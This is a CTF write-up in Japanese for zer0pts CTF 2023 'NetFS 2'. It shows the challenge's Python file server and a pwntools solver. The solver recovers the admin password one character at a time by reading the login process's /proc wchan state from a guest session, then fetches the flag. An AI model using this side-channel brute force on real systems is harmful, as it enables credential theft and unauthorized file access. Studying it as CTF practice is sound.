- Source: zer0pts CTF 2023
- Author: ptr-yudai
NetFS 1の続編。パスワードが間違っていても5秒ほど待ってから切断されるようになった。
server.py
#!/usr/bin/env python3
import multiprocessing
import os
import random
import signal
import socket
import time
import re
assert os.path.isfile("secret/password.txt"), "Password file not found."
MAX_SIZE = 0x1000
LOGIN_USERS = {
b'guest': b'guest',
b'admin': open("secret/password.txt", "rb").read().strip()
}
PROTECTED = [b"server.py", b"secret"]
assert re.fullmatch(b"[0-9a-f]+", LOGIN_USERS[b'admin'])
class Timeout(object):
def __init__(self, seconds):
self.seconds = seconds
self.start = None
def handle_timeout(self, signum, frame):
raise TimeoutError('Timeout')
def wait(self):
signal.alarm(0)
while time.time() - self.start < self.seconds:
time.sleep(0.1)
time.sleep(random.random())
def __enter__(self):
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
self.start = time.time()
return self
def __exit__(self, _type, _value, _traceback):
signal.alarm(0)
time.sleep(random.random())
class PyNetworkFS(object):
def __init__(self, conn):
self._conn = conn
self._auth = False
self._user = None
def __del__(self):
self._conn.close()
@property
def is_authenticated(self):
return self._auth
@property
def is_admin(self):
return self.is_authenticated and self._user == b'admin'
def response(self, message):
self._conn.send(message)
def recvline(self):
data = b''
while True:
match self._conn.recv(1):
case b'': return None
case b'\n': break
case byte: data += byte
return data
def authenticate(self):
"""Login prompt"""
username = password = b''
with Timeout(5):
# Receive username
self.response(b"Username: ")
username = self.recvline()
if username is None: return
if username in LOGIN_USERS:
password = LOGIN_USERS[username]
else:
self.response(b"No such a user exists.\n")
return
with Timeout(5) as timer:
# Receive password
self.response(b"Password: ")
i = 0
while i < len(password):
c = self._conn.recv(1)
if c == b'':
timer.wait()
self.response(b"Incorrect password.\n")
return
elif c != password[i:i+1]:
timer.wait()
self.response(b"Incorrect password.\n")
return
i += 1
if self._conn.recv(1) != b'\n':
timer.wait()
self.response(b"Incorrect password.\n")
return
self.response(b"Logged in.\n")
self._auth = True
self._user = username
def serve(self):
"""Serve files"""
with Timeout(30):
while True:
# Receive filepath
self.response(b"File: ")
filepath = self.recvline()
if filepath is None: return
# Check filepath
if not self.is_admin and \
any(map(lambda name: name in filepath, PROTECTED)):
self.response(b"Permission denied.\n")
continue
# Serve file
try:
f = open(filepath, 'rb')
except FileNotFoundError:
self.response(b"File not found.\n")
continue
except PermissionError:
self.response(b"Permission denied.\n")
continue
except:
self.response(b"System error.\n")
continue
try:
self.response(f.read(MAX_SIZE))
except OSError:
self.response(b"System error.\n")
finally:
f.close()
def pynetfs_main(conn):
nfs = PyNetworkFS(conn)
try:
nfs.authenticate()
except TimeoutError:
nfs.response(b'Incorrect password.\n')
if nfs.is_authenticated:
try:
nfs.serve()
except TimeoutError:
return
if __name__ == '__main__':
# Setup server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
print("Listening on 0.0.0.0:10022")
sock.bind(('0.0.0.0', 10022))
sock.listen(16)
# Handle connection
ps = []
while True:
conn, addr = sock.accept()
ps.append(multiprocessing.Process(target=pynetfs_main, args=(conn,)))
ps[-1].start()
conn.close()
ps = list(filter(lambda p: p.is_alive() or p.join(), ps))
パスワードが間違った時点で入力のreadは打ち切られてsleepするので、その違いをどうにかして取得できれば前問と同じようにブルートフォースでpasswordが求められる。
elif c != password[i:i+1]:
timer.wait()
self.response(b"Incorrect password.\n")
return
def wait(self):
signal.alarm(0)
while time.time() - self.start < self.seconds:
time.sleep(0.1)
time.sleep(random.random())
これはプロセスの状態を見れば分かる。具体的には、/proc/{pid}/wchan
でそのプロセスが「何の待ち状態になっているのか」を確認できる。
よって、guestでログインしてどうにかしてpidを特定し、adminログイン試行のプロセスを確認することでパスワードが間違っているか否かを判断すれば良い。
現在のプロセスの情報は/proc/self/
から分かる。solverはこうなる。
from pwn import *
import time
host = "34.170.146.252"
port = 54172
# host = "localhost"
# port = 10022
# disable info log
context.log_level = "error"
charset = "0123456789abcdef"
password = ""
while True:
for i in range(len(charset)):
p_guest = remote(host, port)
time.sleep(0.1)
p_admin = remote(host, port)
# get pid
p_guest.sendlineafter("Username: ", "guest")
p_guest.sendlineafter("Password: ", "guest")
p_guest.sendlineafter("File: ", "/proc/self/status")
p_guest.recvuntil("Pid:")
admin_pid = int(p_guest.recvline().strip().decode()) + 1
# print("pid:", admin_pid)
# bruteforce
p_admin.recvuntil("Username:")
p_admin.sendline("admin")
p_admin.recvuntil("Password: ")
p_admin.send(password + charset[i])
time.sleep(0.1)
p_guest.sendlineafter("File: ", "/proc/" + str(admin_pid) + "/wchan")
recv = p_guest.recv(10)
p_guest.close()
p_admin.close()
time.sleep(0.1)
# if password is incorrect, process is in "hrtimer_nanosleep"
# else, process is in "wait_woken"
if b"wait_woken" in recv:
password += charset[i]
print(password)
break
if len(password) == 16:
p = remote(host, port)
p.sendlineafter("Username: ", "admin")
p.sendlineafter("Password: ", password)
p.sendlineafter("File: ", "secret/flag.txt")
print(p.recvline())
break
このsolverではadmin_pid
をguest_pid
+1としているが、不特定多数のアクセスが飛んでくるCTF開催中のリモート環境では必ずしもadmin_pid
とguest_pid
が連続するとは限らないので解けない(ことの方が多い)気がする。
とりあえず、AlpacaHackのリモート環境ではflagが得られた。
zer0pts{pr0cfs_1s_5uch_4_n1c3_0r4cl3_5d17c4e}